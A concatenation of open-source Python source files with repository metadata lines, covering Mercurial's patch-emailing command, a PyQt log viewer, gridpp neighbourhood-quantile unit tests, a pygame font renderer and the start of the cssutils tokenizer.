msg.attach(mail.mimeencode(ui, body, _charsets, opts.get('test')))
p = mail.mimetextpatch('\n'.join(patchlines), 'x-patch',
opts.get('test'))
binnode = bin(node)
# if node is mq patch, it will have the patch file's name as a tag
if not patchname:
patchtags = [t for t in repo.nodetags(binnode)
if t.endswith('.patch') or t.endswith('.diff')]
if patchtags:
patchname = patchtags[0]
elif total > 1:
patchname = cmdutil.makefilename(repo, '%b-%n.patch',
binnode, seqno=idx,
total=total)
else:
patchname = cmdutil.makefilename(repo, '%b.patch', binnode)
disposition = 'inline'
if opts.get('attach'):
disposition = 'attachment'
p['Content-Disposition'] = disposition + '; filename=' + patchname
msg.attach(p)
else:
msg = mail.mimetextpatch(body, display=opts.get('test'))
flag = ' '.join(opts.get('flag'))
if flag:
flag = ' ' + flag
subj = desc[0].strip().rstrip('. ')
if not numbered:
subj = '[PATCH%s] %s' % (flag, opts.get('subject') or subj)
else:
tlen = len(str(total))
subj = '[PATCH %0*d of %d%s] %s' % (tlen, idx, total, flag, subj)
msg['Subject'] = mail.headencode(ui, subj, _charsets, opts.get('test'))
msg['X-Mercurial-Node'] = node
return msg, subj, ds
emailopts = [
('', 'body', None, _('send patches as inline message text (default)')),
('a', 'attach', None, _('send patches as attachments')),
('i', 'inline', None, _('send patches as inline attachments')),
('', 'bcc', [], _('email addresses of blind carbon copy recipients')),
('c', 'cc', [], _('email addresses of copy recipients')),
('', 'confirm', None, _('ask for confirmation before sending')),
('d', 'diffstat', None, _('add diffstat output to messages')),
('', 'date', '', _('use the given date as the sending date')),
('', 'desc', '', _('use the given file as the series description')),
('f', 'from', '', _('email address of sender')),
('n', 'test', None, _('print messages that would be sent')),
('m', 'mbox', '', _('write messages to mbox file instead of sending them')),
('', 'reply-to', [], _('email addresses replies should be sent to')),
('s', 'subject', '', _('subject of first message (intro or single patch)')),
('', 'in-reply-to', '', _('message identifier to reply to')),
('', 'flag', [], _('flags to add in subject prefixes')),
('t', 'to', [], _('email addresses of recipients'))]
@command('email',
[('g', 'git', None, _('use git extended diff format')),
('', 'plain', None, _('omit hg patch header')),
('o', 'outgoing', None,
_('send changes not found in the target repository')),
('b', 'bundle', None, _('send changes not in target as a binary bundle')),
('', 'bundlename', 'bundle',
_('name of the bundle attachment file'), _('NAME')),
('r', 'rev', [], _('a revision to send'), _('REV')),
('', 'force', None, _('run even when remote repository is unrelated '
'(with -b/--bundle)')),
('', 'base', [], _('a base changeset to specify instead of a destination '
'(with -b/--bundle)'), _('REV')),
('', 'intro', None, _('send an introduction email for a single patch')),
] + emailopts + commands.remoteopts,
_('hg email [OPTION]... [DEST]...'))
def patchbomb(ui, repo, *revs, **opts):
'''send changesets by email
By default, diffs are sent in the format generated by
:hg:`export`, one per message. The series starts with a "[PATCH 0
of N]" introduction, which describes the series as a whole.
Each patch email has a Subject line of "[PATCH M of N] ...", using
the first line of the changeset description as the subject text.
The message contains two or three parts. First, the changeset
description.
With the -d/--diffstat option, if the diffstat program is
installed, the result of running diffstat on the patch is inserted.
Finally, the patch itself, as generated by :hg:`export`.
With the -d/--diffstat or --confirm options, you will be presented
with a final summary of all messages and asked for confirmation before
the messages are sent.
By default the patch is included as text in the email body for
easy reviewing. Using the -a/--attach option will instead create
an attachment for the patch. With -i/--inline an inline attachment
will be created. You can include a patch both as text in the email
body and as a regular or an inline attachment by combining the
-a/--attach or -i/--inline with the --body option.
With -o/--outgoing, emails will be generated for patches not found
in the destination repository (or only those which are ancestors
of the specified revisions if any are provided)
With -b/--bundle, changesets are selected as for --outgoing, but a
single email containing a binary Mercurial bundle as an attachment
will be sent.
With -m/--mbox, instead of previewing each patchbomb message in a
pager or sending the messages directly, it will create a UNIX
mailbox file with the patch emails. This mailbox file can be
previewed with any mail user agent which supports UNIX mbox
files.
With -n/--test, all steps will run, but mail will not be sent.
You will be prompted for an email recipient address, a subject and
an introductory message describing the patches of your patchbomb.
Then when all is done, patchbomb messages are displayed. If the
PAGER environment variable is set, your pager will be fired up once
for each patchbomb message, so you can verify everything is alright.
In case email sending fails, you will find a backup of your series
introductory message in ``.hg/last-email.txt``.
Examples::
hg email -r 3000 # send patch 3000 only
hg email -r 3000 -r 3001 # send patches 3000 and 3001
hg email -r 3000:3005 # send patches 3000 through 3005
hg email 3000 # send patch 3000 (deprecated)
hg email -o # send all patches not in default
hg email -o DEST # send all patches not in DEST
hg email -o -r 3000 # send all ancestors of 3000 not in default
hg email -o -r 3000 DEST # send all ancestors of 3000 not in DEST
hg email -b # send bundle of all patches not in default
hg email -b DEST # send bundle of all patches not in DEST
hg email -b -r 3000 # bundle of all ancestors of 3000 not in default
hg email -b -r 3000 DEST # bundle of all ancestors of 3000 not in DEST
hg email -o -m mbox && # generate an mbox file...
mutt -R -f mbox # ... and view it with mutt
hg email -o -m mbox && # generate an mbox file ...
formail -s sendmail \\ # ... and use formail to send from the mbox
-bm -t < mbox # ... using sendmail
Before using this command, you will need to enable email in your
hgrc. See the [email] section in hgrc(5) for details.
'''
_charsets = mail._charsets(ui)
bundle = opts.get('bundle')
date = opts.get('date')
mbox = opts.get('mbox')
outgoing = opts.get('outgoing')
rev = opts.get('rev')
# internal option used by pbranches
patches = opts.get('patches')
def getoutgoing(dest, revs):
'''Return the revisions present locally but not in dest'''
url = ui.expandpath(dest or 'default-push', dest or 'default')
url = hg.parseurl(url)[0]
ui.status(_('comparing with %s\n') % util.hidepassword(url))
revs = [r for r in scmutil.revrange(repo, revs) if r >= 0]
if not revs:
revs = [len(repo) - 1]
revs = repo.revs('outgoing(%s) and ::%ld', dest or '', revs)
if not revs:
ui.status(_("no changes found\n"))
return []
return [str(r) for r in revs]
def getpatches(revs):
for r in scmutil.revrange(repo, revs):
output = cStringIO.StringIO()
cmdutil.export(repo, [r], fp=output,
opts=patch.diffopts(ui, opts))
yield output.getvalue().split('\n')
def getbundle(dest):
tmpdir = tempfile.mkdtemp(prefix='hg-email-bundle-')
tmpfn = os.path.join(tmpdir, 'bundle')
try:
commands.bundle(ui, repo, tmpfn, dest, **opts)
fp = open(tmpfn, 'rb')
data = fp.read()
fp.close()
return data
finally:
try:
os.unlink(tmpfn)
except OSError:
pass
os.rmdir(tmpdir)
if not (opts.get('test') or mbox):
# really sending
mail.validateconfig(ui)
if not (revs or rev or outgoing or bundle or patches):
raise util.Abort(_('specify at least one changeset with -r or -o'))
if outgoing and bundle:
raise util.Abort(_("--outgoing mode always on with --bundle;"
" do not re-specify --outgoing"))
if outgoing or bundle:
if len(revs) > 1:
raise util.Abort(_("too many destinations"))
dest = revs and revs[0] or None
revs = []
if rev:
if revs:
raise util.Abort(_('use only one form to specify the revision'))
revs = rev
if outgoing:
revs = getoutgoing(dest, rev)
if bundle:
opts['revs'] = revs
# start
if date:
start_time = util.parsedate(date)
else:
start_time = util.makedate()
def genmsgid(id):
return '<%s.%s@%s>' % (id[:20], int(start_time[0]), socket.getfqdn())
def getdescription(body, sender):
if opts.get('desc'):
body = open(opts.get('desc')).read()
else:
ui.write(_('\nWrite the introductory message for the '
'patch series.\n\n'))
body = ui.edit(body, sender)
# Save series description in case sendmail fails
msgfile = repo.opener('last-email.txt', 'wb')
msgfile.write(body)
msgfile.close()
return body
def getpatchmsgs(patches, patchnames=None):
msgs = []
ui.write(_('this patch series consists of %d patches.\n\n')
% len(patches))
# build the intro message, or skip it if the user declines
if introwanted(opts, len(patches)):
msg = makeintro(patches)
if msg:
msgs.append(msg)
# are we going to send more than one message?
numbered = len(msgs) + len(patches) > 1
# now generate the actual patch messages
name = None
for i, p in enumerate(patches):
if patchnames:
name = patchnames[i]
msg = makepatch(ui, repo, p, opts, _charsets, i + 1,
len(patches), numbered, name)
msgs.append(msg)
return msgs
def makeintro(patches):
tlen = len(str(len(patches)))
flag = opts.get('flag') or ''
if flag:
flag = ' ' + ' '.join(flag)
prefix = '[PATCH %0*d of %d%s]' % (tlen, 0, len(patches), flag)
subj = (opts.get('subject') or
prompt(ui, '(optional) Subject: ', rest=prefix, default=''))
if not subj:
return None # skip intro if the user doesn't bother
subj = prefix + ' ' + subj
body = ''
if opts.get('diffstat'):
# generate a cumulative diffstat of the whole patch series
diffstat = patch.diffstat(sum(patches, []))
body = '\n' + diffstat
else:
diffstat = None
body = getdescription(body, sender)
msg = mail.mimeencode(ui, body, _charsets, opts.get('test'))
msg['Subject'] = mail.headencode(ui, subj, _charsets,
opts.get('test'))
return (msg, subj, diffstat)
def getbundlemsgs(bundle):
subj = (opts.get('subject')
or prompt(ui, 'Subject:', 'A bundle for your repository'))
body = getdescription('', sender)
msg = email.MIMEMultipart.MIMEMultipart()
if body:
msg.attach(mail.mimeencode(ui, body, _charsets, opts.get('test')))
datapart = email.MIMEBase.MIMEBase('application', 'x-mercurial-bundle')
datapart.set_payload(bundle)
bundlename = '%s.hg' % opts.get('bundlename', 'bundle')
datapart.add_header('Content-Disposition', 'attachment',
filename=bundlename)
email.Encoders.encode_base64(datapart)
msg.attach(datapart)
msg['Subject'] = mail.headencode(ui, subj, _charsets, opts.get('test'))
return [(msg, subj, None)]
sender = (opts.get('from') or ui.config('email', 'from') or
ui.config('patchbomb', 'from') or
prompt(ui, 'From', ui.username()))
if patches:
msgs = getpatchmsgs(patches, opts.get('patchnames'))
elif bundle:
msgs = getbundlemsgs(getbundle(dest))
else:
msgs = getpatchmsgs(list(getpatches(revs)))
showaddrs = []
def getaddrs(header, ask=False, default=None):
configkey = header.lower()
opt = header.replace('-', '_').lower()
addrs = opts.get(opt)
if addrs:
showaddrs.append('%s: %s' % (header, ', '.join(addrs)))
return mail.addrlistencode(ui, addrs, _charsets, opts.get('test'))
# not on the command line: fallback to config and then maybe ask
addr = (ui.config('email', configkey) or
ui.config('patchbomb', configkey) or
'')
if not addr and ask:
addr = prompt(ui, header, default=default)
if addr:
showaddrs.append('%s: %s' % (header, addr))
return mail.addrlistencode(ui, [addr], _charsets, opts.get('test'))
else:
return default
to = getaddrs('To', ask=True)
if not to:
# we can get here in non-interactive mode
raise util.Abort(_('no recipient addresses provided'))
cc = getaddrs('Cc', ask=True, default='') or []
bcc = getaddrs('Bcc') or []
replyto = getaddrs('Reply-To')
if opts.get('diffstat') or opts.get('confirm'):
ui.write(_('\nFinal summary:\n\n'))
ui.write(('From: %s\n' % sender))
for addr in showaddrs:
ui.write('%s\n' % addr)
for m, subj, ds in msgs:
ui.write(('Subject: %s\n' % subj))
if ds:
ui.write(ds)
ui.write('\n')
if ui.promptchoice(_('are you sure you want to send (yn)?'
'$$ &Yes $$ &No')):
raise util.Abort(_('patchbomb canceled'))
ui.write('\n')
parent = opts.get('in_reply_to') or None
# angle brackets may be omitted, they're not semantically part of the msg-id
if parent is not None:
if not parent.startswith('<'):
parent = '<' + parent
if not parent.endswith('>'):
parent += '>'
sender_addr = email.Utils.parseaddr(sender)[1]
sender = mail.addressencode(ui, sender, _charsets, opts.get('test'))
sendmail = None
for i, (m, subj, ds) in enumerate(msgs):
try:
m['Message-Id'] = genmsgid(m['X-Mercurial-Node'])
except TypeError:
m['Message-Id'] = genmsgid('patchbomb')
if parent:
m['In-Reply-To'] = parent
m['References'] = parent
if not parent or 'X-Mercurial-Node' not in m:
parent = m['Message-Id']
m['User-Agent'] = 'Mercurial-patchbomb/%s' % util.version()
m['Date'] = email.Utils.formatdate(start_time[0], localtime=True)
start_time = (start_time[0] + 1, start_time[1])
m['From'] = sender
m['To'] = ', '.join(to)
if cc:
m['Cc'] = ', '.join(cc)
if bcc:
m['Bcc'] = ', '.join(bcc)
if replyto:
m['Reply-To'] = ', '.join(replyto)
if opts.get('test'):
ui.status(_('displaying '), subj, ' ...\n')
ui.flush()
if 'PAGER' in os.environ and not ui.plain():
fp = util.popen(os.environ['PAGER'], 'w')
else:
fp = ui
generator = email.Generator.Generator(fp, mangle_from_=False)
try:
generator.flatten(m, 0)
fp.write('\n')
except IOError, inst:
if inst.errno != errno.EPIPE:
raise
if fp is not ui:
fp.close()
else:
if not sendmail:
verifycert = ui.config('smtp', 'verifycert')
if opts.get('insecure'):
ui.setconfig('smtp', 'verifycert', 'loose')
try:
sendmail = mail.connect(ui, mbox=mbox)
finally:
ui.setconfig('smtp', 'verifycert', verifycert)
ui.status(_('sending '), subj, ' ...\n')
ui.progress(_('sending'), i, item=subj, total=len(msgs))
if not mbox:
# Exim does not remove the Bcc field
del m['Bcc']
fp = cStringIO.StringIO()
generator = email.Generator.Generator(fp, mangle_from_=False)
generator.flatten(m, 0)
sendmail(sender_addr, to + bcc + cc, fp.getvalue())
ui.progress(_('writing'), None)
ui.progress(_('sending'), None)
| gpl-2.0 | -2,522,663,191,073,142,300 | 37.15508 | 80 | 0.575286 | false |
geosohh/AnimeTorr | animetorr/manager/log.py | 1 | 7132 | # -*- coding: utf-8 -*-
"""
Log window.
"""
__author__ = 'Sohhla'
import os
from PyQt4 import QtGui, QtCore
from qt.log import Ui_Dialog as Ui_Log
from shared import constant
# TODO: Works, but waaaaaay too slow to load
class LogUpdater(QtCore.QObject):
"""
Updates the [Log window].
"""
finish = QtCore.pyqtSignal()
update_ui = QtCore.pyqtSignal(str)
def __init__(self, parent=None):
super(LogUpdater, self).__init__(parent)
self.log_paused = False
self.previous_log_file_size = 0
self.timer = None
self.log_lines_read = -1
self.html_log = ""
def start_timer(self):
"""
Starts timer. When it times out, will update the window again.
"""
self.timer = QtCore.QTimer()
# noinspection PyUnresolvedReferences
self.timer.timeout.connect(self.update_log) # PyCharm doesn't recognize timeout.connect()...
self.timer.setSingleShot(True)
self.timer.start(1000)
def update_log(self):
"""
Reads the log file and updates the window.
"""
if not self.log_paused:
try:
log_size = os.path.getsize(constant.LOG_PATH)
except os.error:
log_size = -1
if self.previous_log_file_size!=log_size and log_size!=-1:
if self.previous_log_file_size > log_size:
self.log_lines_read = -1
if self.log_lines_read == -1:
self.html_log = "<table style=\"font-family:'MS Shell Dlg 2',monospace; font-size:14\">"
# reading log, converting into html
line_i = 0
for log_line in open(constant.LOG_PATH,'r'):
if line_i >= self.log_lines_read:
temp = log_line.split(" ## ")
asctime = temp[0].strip()
name = temp[1].strip()
levelname = temp[2].strip()
message = temp[3].strip()
color = "0000FF"
if levelname=="DEBUG":
color = "008000"
elif levelname=="INFO":
color = "000000"
elif levelname=="WARNING":
color = "B8860B"
elif levelname=="ERROR":
color = "FF0000"
elif levelname=="CRITICAL":
color = "8A2BE2"
temp = "<tr style=\"color:#"+color+";\">\
<td style=\"padding-right: 5px;\">"+asctime+"</td>\
<td style=\"padding-right: 10px;padding-left: 10px;\" align=\"center\">#</td>\
<td style=\"padding-right: 5px; padding-left: 5px; \" align=\"center\">"+name+"</td>\
<td style=\"padding-right: 10px;padding-left: 10px;\" align=\"center\">#</td>\
<td style=\"padding-right: 5px; padding-left: 5px; \" align=\"center\">"+levelname+"</td>\
<td style=\"padding-right: 10px;padding-left: 10px;\" align=\"center\">#</td>\
<td style=\"padding-left: 5px;\">"+message+"</td></tr>"
self.html_log += temp
line_i+=1
self.log_lines_read = line_i
if self.log_paused:
self.finish.emit() # log paused, exiting thread
else:
# sending update to GUI
self.update_ui.emit(self.html_log+"</table>")
self.previous_log_file_size = log_size
self.start_timer()
else:
self.finish.emit()
def stop_thread(self):
"""
Stops log update.
"""
if self.timer is not None:
self.timer.stop()
self.finish.emit()
class WindowLog():
"""
Creates Log window.
"""
def __init__(self, parent_window):
self.dialog_log = WindowLogDialog(self, parent_window, QtCore.Qt.WindowSystemMenuHint |
QtCore.Qt.WindowMaximizeButtonHint |
QtCore.Qt.WindowTitleHint |
QtCore.Qt.Window)
self.ui_log = Ui_Log()
self.ui_log.setupUi(self.dialog_log)
self.ui_log.button_pause.clicked.connect(self.pause_log)
self.ui_log.text_log.setHtml("Loading...")
self.log_paused = False
self.thread = None
self.log_updater = None
self.create_thread()
def show(self):
"""
Shows Log window.
"""
self.dialog_log.exec_()
def create_thread(self):
"""
Creates thread to update log.
"""
self.thread = QtCore.QThread(self.dialog_log)
self.log_updater = LogUpdater()
self.log_updater.moveToThread(self.thread)
self.log_updater.update_ui.connect(self.update_log_ui)
self.log_updater.finish.connect(self.thread.quit)
# noinspection PyUnresolvedReferences
self.thread.started.connect(self.log_updater.update_log) # PyCharm doesn't recognize started.connect()...
self.thread.start()
self.dialog_log.stop_thread.connect(self.log_updater.stop_thread)
def update_log_ui(self,new_html):
"""
Update window with new html.
:type new_html: str
:param new_html: ...
"""
self.ui_log.text_log.setHtml(new_html)
temp_cursor = self.ui_log.text_log.textCursor()
temp_cursor.movePosition(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
self.ui_log.text_log.setTextCursor(temp_cursor)
self.dialog_log.repaint()
# noinspection PyArgumentList
QtCore.QCoreApplication.processEvents(QtCore.QEventLoop.AllEvents)
def pause_log(self):
"""
Stops window from being updated until the user clicks the button again.
"""
if self.log_paused:
self.log_paused = False
self.ui_log.button_pause.setText("Pause Log")
self.create_thread()
else:
self.log_paused = True
self.ui_log.button_pause.setText("Resume Log")
self.dialog_log.stop_thread.emit()
class WindowLogDialog(QtGui.QDialog):
"""
Overrides default QDialog class to be able to control the close window event.
"""
stop_thread = QtCore.pyqtSignal()
def __init__(self, window, parent=None, params=None):
super(WindowLogDialog, self).__init__(parent,params)
self.window = window
def closeEvent(self, _):
"""
When closing the window, stop the thread.
:type _: QCloseEvent
:param _: Describes the close event. Not used.
"""
if self.window.log_updater is not None:
self.stop_thread.emit() | gpl-2.0 | -3,731,463,448,882,287,600 | 35.768041 | 122 | 0.514582 | false |
metno/gridpp | tests/neighbourhood_quantile_fast_test.py | 1 | 5647 | from __future__ import print_function
import unittest
import gridpp
import numpy as np
lats = [60, 60, 60, 60, 60, 70]
lons = [10,10.1,10.2,10.3,10.4, 10]
"""Simple check
20 21 22 23 24
15 16 17 18 19
10 11 12 13 nan
5 6 7 nan 9
0 1 2 3 4
"""
values = np.reshape(range(25), [5, 5]).astype(float)
values[1, 3] = np.nan
values[2, 4] = np.nan
values = np.array(values)
class Test(unittest.TestCase):
def test_invalid_arguments(self):
"""Check that exception is thrown for invalid arguments"""
field = np.ones([5, 5])
halfwidth = -1
quantiles = [-0.1, 1.1, np.nan]
thresholds = [0, 1]
for quantile in quantiles:
with self.assertRaises(ValueError) as e:
gridpp.neighbourhood_quantile_fast(field, quantile, halfwidth, thresholds)
def test_nan_quantile(self):
field = np.ones([5, 5])
halfwidth = 1
quantile = np.nan
thresholds = [0, 1]
output = gridpp.neighbourhood_quantile_fast(field, quantile, halfwidth, thresholds)
np.testing.assert_array_almost_equal(np.nan*np.ones(output.shape), output)
def test_empty(self):
for quantile in np.arange(0.1,0.9,0.1):
for num_thresholds in [1, 2]:
thresholds = gridpp.get_neighbourhood_thresholds(values, num_thresholds)
output = gridpp.neighbourhood_quantile_fast([[]], 0.9, 1, thresholds)
self.assertEqual(len(output.shape), 2)
self.assertEqual(output.shape[0], 0)
self.assertEqual(output.shape[1], 0)
def test_single_threshold(self):
"""Checks what happens when a single threshold is provided"""
thresholds = [0]
field = np.reshape(np.arange(9), [3, 3])
for halfwidth in [0, 1, 2]:
output = gridpp.neighbourhood_quantile_fast(field, 0.9, halfwidth, thresholds)
np.testing.assert_array_equal(output, np.zeros([3, 3]))
def test_two_thresholds(self):
"""Checks what happens when a single threshold is provided"""
thresholds = [0, 1]
field = np.reshape(np.arange(9), [3, 3])
for halfwidth in [0, 1, 2]:
output = gridpp.neighbourhood_quantile_fast(field, 0.9, 0, thresholds)
self.assertTrue(((output >= 0) & (output <= 1)).all())
def test_missing(self):
empty = np.zeros([5, 5])
empty[0:3, 0:3] = np.nan
thresholds = [0, 1]
output = gridpp.neighbourhood_quantile_fast(empty, 0.5, 1, thresholds)
self.assertTrue(np.isnan(np.array(output)[0:2,0:2]).all())
def test_quantile(self):
thresholds = gridpp.get_neighbourhood_thresholds(values, 100)
output = np.array(gridpp.neighbourhood_quantile_fast(values, 0.5, 1, thresholds))
self.assertEqual(output[2][2], 12) # Should be 12.5
self.assertEqual(output[2][3], 12.5) # Should be 13
output = np.array(gridpp.neighbourhood_quantile_fast(np.full([100,100], np.nan), 0.5, 1, thresholds))
self.assertTrue(np.isnan(np.array(output)).all())
output = np.array(gridpp.neighbourhood_quantile_fast(np.zeros([100,100]), 0.5, 1, thresholds))
self.assertTrue((np.array(output) == 0).all())
output = np.array(gridpp.neighbourhood_quantile(values, 0.5, 1))
self.assertEqual(output[2][2], 12.5)
self.assertEqual(output[2][3], 13)
self.assertEqual(output[0][4], 4)
def test_3d(self):
np.random.seed(1000)
values = np.random.rand(200, 200)
values3 = np.zeros([200, 200, 5])
for i in range(5):
values3[:, :, i] = values
halfwidths = [0, 1, 5]
quantile = 0.5
thresholds = [0, 0.25, 0.5, 0.75, 1]
for halfwidth in halfwidths:
output_2d = gridpp.neighbourhood_quantile_fast(values, quantile, halfwidth, thresholds)
output_3d = gridpp.neighbourhood_quantile_fast(values3, quantile, halfwidth, thresholds)
np.testing.assert_array_almost_equal(output_2d, output_3d)
def test_varying_quantile(self):
""" For now check that this runs """
values = np.array([[0, 1], [2, 3], [4, 5]])
halfwidth = 1
quantiles = np.ones(values.shape) * 0.5
thresholds = [0, 0.25, 0.5, 0.75, 1]
gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds)
values = np.nan *np.zeros(values.shape)
np.testing.assert_array_equal(values, gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds))
def test_varying_quantile_3d(self):
""" For now check that this runs """
np.random.seed(1000)
values = np.random.rand(100, 50, 2)
halfwidth = 1
quantiles = np.ones(values[:, :, 0].shape) * 0.5
thresholds = [0, 0.25, 0.5, 0.75, 1]
gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds)
values = np.nan *np.zeros(values.shape)
np.testing.assert_array_equal(values[:, :, 0], gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds))
def test_all_same(self):
""" Check that min and max of an neighbourhood with all identical values is correct """
field = np.zeros([10, 10])
thresholds = [0, 0.1, 0.2, 0.5, 1, 2, 5, 10, 20, 50, 100]
for quantile in [0, 0.001, 0.999, 1]:
with self.subTest(quantile=quantile):
output = gridpp.neighbourhood_quantile_fast(field, quantile, 5, thresholds)
np.testing.assert_array_almost_equal(output, field)
if __name__ == '__main__':
unittest.main()
| gpl-2.0 | 6,977,101,496,407,008,000 | 39.335714 | 132 | 0.606517 | false |
Fenixin/yogom | tryengine/fontrenderer.py | 1 | 8186 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is part of TryEngine.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
'''
Created on 20/03/2014
@author: Alejandro Aguilera Martínez
@email: [email protected]
Module to render fonts with different effects.
See FontRenderer for help.
'''
from itertools import product
from math import ceil
import pygame as pg
from pygame.font import Font
from pygame import Surface
from pygame.transform import laplacian
#TODO: Transparent things aren't handled properly!
# Choosing the same color as the transparent color
# used internally will do very ugly stuff
class FontRenderer(object):
'''
Object to render text of any size.
Rendering text is made through layers. Layer are passed to
render with a list. You can render as many layer as you want.
Here it is an example with all the layer types:
layers = [
('external_border',{'width':2, 'color':VIOLET}),
('shadows',{'positions_and_colors':[((2,-2),GREEN),((1,-1),RED)]}),
('normal',{'color':WHITE}),#
('internal_border', {'color':(GREEN)}),
('textured',{'image':image_texture})
]
'''
TRANSPARENT = (255, 0, 255)
def __init__(self, font_file, antialias=False):
'''
Constructor
'''
if font_file:
self.font_file = font_file
else:
self.font_file = pg.font.get_default_font()
self._font_sizes = {}
self.antialias = antialias
# Parameters to create images
self.DISPLAY_BITDEPTH = pg.display.get_surface().get_bitsize()
self.IMG_FLAGS = pg.HWSURFACE
def _add_fontsize(self, filename, size):
""" Add a font size renderer to _font_sizes. """
self._font_sizes[size] = Font(filename, size)
def __getitem__(self, size):
""" Return the proper font size. """
try:
return self._font_sizes[size]
except KeyError:
self._add_fontsize(self.font_file, size)
return self._font_sizes[size]
def _get_new_surface(self, text, pixel_size):
""" Return a surface with the needed size for the text."""
img = Surface(pixel_size, self.IMG_FLAGS)
img.fill(self.TRANSPARENT)
img.set_colorkey(self.TRANSPARENT)
return img
def size(self, text, size, layers = []):
""" Return the image size in pixels.
This take into account all the layer given
and calculate the correct image size.
"""
x, y = self[size].size(text)
for layer in layers:
if layer[0] == 'shadows':
mx = my = 0
for t in layer[1]['positions_and_colors']:
mx = max(abs(t[0][0]), mx)
my = max(abs(t[0][1]), my)
x += mx*2
y += my*2
elif layer[0] == 'external_border':
width = layer[1]['width']
x += width*2
y += width*2
return (x,y)
def _render_internal(self, text, size, color, bg_color):
"""
Wrapper
"""
# For fastest blitting set hwsurface and the same
# bit depth as the display surface.
# Also for your
# own sanity, remember that rendering fonts will give
# you a 8bit image and, sometimes, this will give
# unexpected results
# when blittings in a 32bits surface
img = self[size].render(text, self.antialias, color, bg_color)
return img.convert(self.DISPLAY_BITDEPTH, self.IMG_FLAGS)
def render(self, text, size, bg_color, bg_transparent, layers):
""" Render text through the defined layers. """
pixel_size = self.size(text, size, layers)
wo_effects_ps = self[size].size(text)
offset = ((pixel_size[0] - wo_effects_ps[0]) / 2,
(pixel_size[1] - wo_effects_ps[1]) / 2)
result = self._get_new_surface(text, pixel_size)
result.fill(bg_color)
if bg_transparent:
result.set_colorkey(bg_color)
# Create all the images and blit them together
images = [getattr(self, '_' + fun)(text, size, pixel_size, offset, **args) for fun, args in layers]
[result.blit(image, (0,0)) for image in images]
return result
def _fill_image(self, dest, filler, blendmode = 0):
""" Fills dest surface with filler repeating if necesary. """
ds = dest.get_size()
fs = filler.get_size()
for x in xrange(int(ceil(ds[0]/float(fs[0])))):
for y in xrange(int(ceil(ds[1]/float(fs[1])))):
dest.blit(filler, (x*fs[0],y*fs[1]), None, blendmode)
print x,y
"""
Layers
"""
def _textured(self, text, size, pixel_size, offset, image = None):
""" Render a textured font.
Transparent colors in the texture will be ignored.
"""
BG = (0,0,0)
FG = (255,255,255)
blendmode = pg.BLEND_MULT
temp = self._get_new_surface(text, pixel_size)
temp.fill(BG)
temp.blit(self._render_internal(text, size, FG, BG), offset)
self._fill_image(temp, image, blendmode)
return temp
def _normal(self, text, size, pixel_size, offset, color = None):
""" Return a normal render of the text. """
s = self._get_new_surface(text, pixel_size)
img = self._render_internal(text, size, color, self.TRANSPARENT)
img.set_colorkey(self.TRANSPARENT)
s.blit(img, offset)
return s
def _shadows(self, text, size, pixel_size, offset, positions_and_colors):
""" Add 'shadows' with different colors. """
wo_effects_ps = self[size].size(text)
offset = ((pixel_size[0] - wo_effects_ps[0]) / 2,
(pixel_size[1] - wo_effects_ps[1]) / 2)
f = self._render_internal
s = self._get_new_surface(text, pixel_size)
transparent = self.TRANSPARENT
for pos,color in positions_and_colors:
shadow = f(text, size, color, transparent)
shadow.set_colorkey(transparent)
n_pos = (pos[0]+offset[0], pos[1]+offset[1])
s.blit(shadow, n_pos)
return s
def _external_border(self, text, size, pixel_size, offset, width = None, color = None):
""" Add an external border (outside of the font). """
wo_effects_ps = self[size].size(text)
offset = ((pixel_size[0] - wo_effects_ps[0]) / 2,
(pixel_size[1] - wo_effects_ps[1]) / 2)
l = []
for x, y in product(xrange(-width, width+1, 1),xrange(-width, width+1, 1)):
l.append( ((x,y),color) )
return self._shadows(text, size, pixel_size, offset, l)
def _internal_border(self, text, size, pixel_size, offset, color = None):
""" Add an internal border (inside of the font). """
# Use very different colors to get a very sharp edge
BG = (0,0,0)
FG = (255,255,255)
temp = self._get_new_surface(text, pixel_size)
temp.fill(BG)
temp.blit(self._render_internal(text, size, FG, BG), offset)
temp = laplacian(temp)
temp.set_colorkey(FG)
result = self._get_new_surface(text, pixel_size)
result.fill(color)
result.blit(temp, (0,0))
result.set_colorkey(BG)
return result
| gpl-3.0 | -3,237,735,693,081,282,000 | 32.137652 | 107 | 0.5719 | false |
kgn/cssutils | src/cssutils/tokenize2.py | 1 | 9735 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""New CSS Tokenizer (a generator)
"""
__all__ = ['Tokenizer', 'CSSProductions']
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
from cssproductions import *
from helper import normalize
import itertools
import re
_TOKENIZER_CACHE = {}
class Tokenizer(object):
"""
generates a list of Token tuples:
(Tokenname, value, startline, startcolumn)
"""
_atkeywords = {
u'@font-face': CSSProductions.FONT_FACE_SYM,
u'@import': CSSProductions.IMPORT_SYM,
u'@media': CSSProductions.MEDIA_SYM,
u'@namespace': CSSProductions.NAMESPACE_SYM,
u'@page': CSSProductions.PAGE_SYM,
u'@variables': CSSProductions.VARIABLES_SYM
}
_linesep = u'\n'
unicodesub = re.compile(r'\\[0-9a-fA-F]{1,6}(?:\r\n|[\t|\r|\n|\f|\x20])?').sub
cleanstring = re.compile(r'\\((\r\n)|[\n|\r|\f])').sub
def __init__(self, macros=None, productions=None, doComments=True):
"""
inits tokenizer with given macros and productions which default to
cssutils own macros and productions
"""
if type(macros)==type({}):
macros_hash_key = sorted(macros.items())
else:
macros_hash_key = macros
hash_key = str((macros_hash_key, productions))
if hash_key in _TOKENIZER_CACHE:
(tokenmatches, commentmatcher, urimatcher) = _TOKENIZER_CACHE[hash_key]
else:
if not macros:
macros = MACROS
if not productions:
productions = PRODUCTIONS
tokenmatches = self._compile_productions(self._expand_macros(macros,
productions))
